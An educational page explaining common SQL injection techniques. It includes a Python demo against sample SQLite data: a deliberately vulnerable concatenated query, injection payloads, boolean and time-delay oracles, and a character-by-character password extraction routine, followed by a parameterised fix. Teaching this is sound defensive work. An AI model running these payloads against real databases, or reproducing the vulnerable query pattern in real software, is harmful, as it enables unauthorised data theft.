SQL injection is one of the most common ways of attacking a web application. Input that the application concatenates into an SQL statement is crafted so that the database server executes SQL the developer never intended: reading data that should be private, modifying or deleting it, or making the database unusable for the application. Over time a number of techniques have evolved to get past the countermeasures web application developers deploy. This page covers the most commonly used ones.
Boolean Based Blind Injection
Boolean-based blind SQLi injects a condition into the application's query so that the HTTP response differs visibly depending on whether the condition evaluated to true or false in the database. No query output is returned directly; the attacker reads the answer from the difference between the two responses (a "user found" page versus an empty result, for instance).
Each request therefore yields one bit of information, and that is enough to extract data: by asking questions such as "is the first character of the admin password greater than 'm'?" and narrowing the range with each answer, an attacker recovers values one character at a time. It is slow and generates a lot of requests, which is why it is usually tried only when the application returns neither query output nor error text.
Time Based Blind Injection
Time-based blind SQLi has the same objective, inferring whether an injected condition is true or false, but is used when the application's response does not differ visibly. The injected query calls a delay function (SLEEP() in MySQL, pg_sleep() in PostgreSQL, WAITFOR DELAY in MSSQL) only when the condition holds, so the answer is read from whether the HTTP response arrives late or immediately, rather than from two different response bodies as in boolean-based blind injection.
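The following is an added example, not code from the original page: a hypothetical vulnerable lookup against an in-memory SQLite database, with both a boolean-based and a time-based oracle driving the same character-by-character extraction routine. SQLite has no SLEEP(), so a Python function named sleep is registered as a stand-in (an assumption of this demo). The table, user and secret are constructed sample data.

```python
import sqlite3
import time

# Constructed sample data, not from the page: one user whose password
# the attacker wants to recover without ever seeing query output.
SECRET = "s3cr3t"


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users (name, password) VALUES ('alice', ?)", (SECRET,))
    # SQLite has no SLEEP(); a Python function is registered as a stand-in
    # (an assumption of this demo) so the time-based oracle can be shown too.
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    return conn


def vulnerable_lookup(conn, name):
    """Hypothetical vulnerable endpoint: the user-supplied value is pasted into the SQL text."""
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def boolean_oracle(conn, condition):
    """Boolean-based: the page shows a result only when the injected condition is true."""
    payload = "alice' AND (" + condition + ") --"
    return len(vulnerable_lookup(conn, payload)) > 0


def time_oracle(conn, condition, delay=0.03):
    """Time-based: the row comes back either way; only the response time differs."""
    payload = ("alice' AND (CASE WHEN (" + condition + ") THEN sleep("
               + str(delay) + ") ELSE 0 END) = 0 --")
    start = time.monotonic()
    vulnerable_lookup(conn, payload)
    return time.monotonic() - start >= delay * 0.8


def extract_secret(conn, oracle, column="password", table="users", row="name = 'alice'"):
    """Recover a string one yes/no question at a time, binary-searching each character."""
    length = 0
    while oracle(conn, f"(SELECT length({column}) FROM {table} WHERE {row}) > {length}"):
        length += 1
    result = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII; every answer halves the interval
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"(SELECT unicode(substr({column}, {pos}, 1)) "
                            f"FROM {table} WHERE {row}) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


def safe_lookup(conn, name):
    """The fix: a parameterised query. The value is bound, never spliced into the SQL."""
    return conn.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print(extract_secret(db, boolean_oracle))    # s3cr3t, roughly 50 requests
    print(extract_secret(db, time_oracle))       # same result, each 'true' costs a delay
    print(safe_lookup(db, "alice' AND 1=0 --"))  # [] : the payload is just a name now
```

Both oracles answer the same question, so the extraction loop does not care which one it is given; on a real target the boolean version is preferred because a delayed response is easier to misread under network jitter than a changed page.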
Error Based Injection
Error-based SQLi is one of the most direct forms of the attack, because the attacker reads results straight out of error messages instead of inferring them. When the application returns database errors unhandled, the messages disclose the DBMS type and version, the structure of the query being injected into, and table and column names. Some DBMS functions can also be made to fail with an error message that embeds the result of a sub-query, so data can be extracted one value per request. With that information an experienced attacker can craft precise queries to dump or destroy the database rather than guessing blindly.
Union Query Based Injection
Union-based SQLi is an in-band technique that uses the UNION operator to append the results of an attacker-chosen SELECT to the results of the application's own query, so the extra rows come back in the normal HTTP response. The injected SELECT must return the same number of columns, with compatible types, as the original; the attacker first works that out (for example with ORDER BY n or UNION SELECT NULL, NULL, ...) and then substitutes columns from the tables of interest, typically starting with the schema catalogue. It is the usual choice when stacked queries are not available, either because the database driver executes only one statement per call or because the semicolon is filtered on the input channel.
Stacked Queries Injection
Stacked-query SQLi terminates the application's statement with a semicolon and appends one or more complete statements of the attacker's own in the same injection. This gives the intruder far more control than a modified SELECT: the appended statements can be UPDATE, DELETE, INSERT, DDL, or calls to stored procedures, executed together in one request. Whether it works depends less on the database than on how the application talks to it: many database APIs execute exactly one statement per call and reject the rest, while others run the whole string.
Out of Band SQL Injection
Out-of-band SQLi sends the result over a different channel from the HTTP response, typically a DNS lookup or HTTP request made by the database server to a host the attacker controls, with the extracted data encoded into the hostname or URL. It is the fallback when in-band techniques return nothing and time-based inference is unreliable, for instance because the server's response time is unstable or because repeated probing of the same channel is throttled.
The precondition is that the database server can make outbound DNS or HTTP requests to an external host. That is not a default configuration unless the application specifically needs it, so this technique is available less often than the others.